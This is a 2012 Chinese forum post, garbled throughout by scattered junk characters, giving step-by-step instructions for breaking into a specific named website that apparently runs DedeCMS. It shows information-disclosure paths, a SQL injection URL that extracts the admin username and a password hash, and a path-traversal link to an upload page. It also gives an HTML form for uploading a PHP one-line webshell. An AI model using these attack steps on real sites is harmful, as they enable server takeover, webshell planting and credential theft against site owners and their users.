①注入漏洞。4 S# m6 n1 r! R3 w; l8 T# a
这站 http://www.political-security.com/( Q( Q: g3 a- U0 r
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
. `2 C7 `1 T& [, _www.political-security.com/data/mysql_error_trace.inc 爆后台
( `5 A# R0 e, l* `# [' ^然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。" r u2 \; p: m/ G: W9 ]- d
然后写上语句
( m7 W, h' m' V8 C6 c- ?+ ?查看管理员帐号8 X: W0 o7 e# i6 m0 r
http://www.political-security.co ... &membergroup=@`- D! v8 |4 W; T: m. G6 U2 ]
+ V- Q+ C% z7 Y1 b" U8 v6 @7 k
admin
6 F" Z, l, I; k+ ^. i+ c$ Y3 k9 z) x( I6 w; x5 h: z# \0 {$ K( C
查看管理员密码+ v @( I* Y* @( s
http://www.political-security.co ... &membergroup=@`; O; u7 {. A; Z6 ^# N1 o7 {
! F+ |& G9 W ~5 L( O/ n8d29b1ef9f8c5a5af429
7 U# o0 H* e* H1 b0 |* t6 a! N: t0 K
查看管理员密码
9 d* o" T" P4 ]! v* F' ^$ n. Z
) q. K- }& j/ w' f) G得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD57 Y4 B) g5 y0 ~9 G
3 g7 o- t9 Q4 q1 @8 A6 @1 M) i. ?8d25 U- Z. U$ K6 X/ T+ ~
9b1ef9f8c5a5af42
8 n, S8 p0 S% n/ ~! K9) F" }$ @7 G2 ]& A
: |: R0 D' G0 r: l! s" }# Jcmd5没解出来 只好测试第二个方法
- `. ~6 |# q' m2 a' W+ M. d( p! k( E- U
5 q9 p0 `; Q+ s) ^+ L$ f
②上传漏洞:
4 |& O( G: q) S" U# e) `' S ^! J" z& h9 ^0 \# I
只要登陆会员中心,然后访问页面链接
' D3 o, ?8 M- ^1 n: Z+ r“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 O5 d9 a) k* l6 k9 c
* E8 c( B1 \ D如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”" j$ o. L- w$ I4 L [! J7 _8 w
/ R+ B4 P% l1 S1 L+ ~5 L$ D" G
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
7 s- k, a) d" J3 ]: O/ w) f1 Q
# M1 d8 O1 w) X& d" I<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
2 H9 y, ~$ G z! i( k! ]或者
8 J* M8 N8 E5 a4 j" N6 D即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对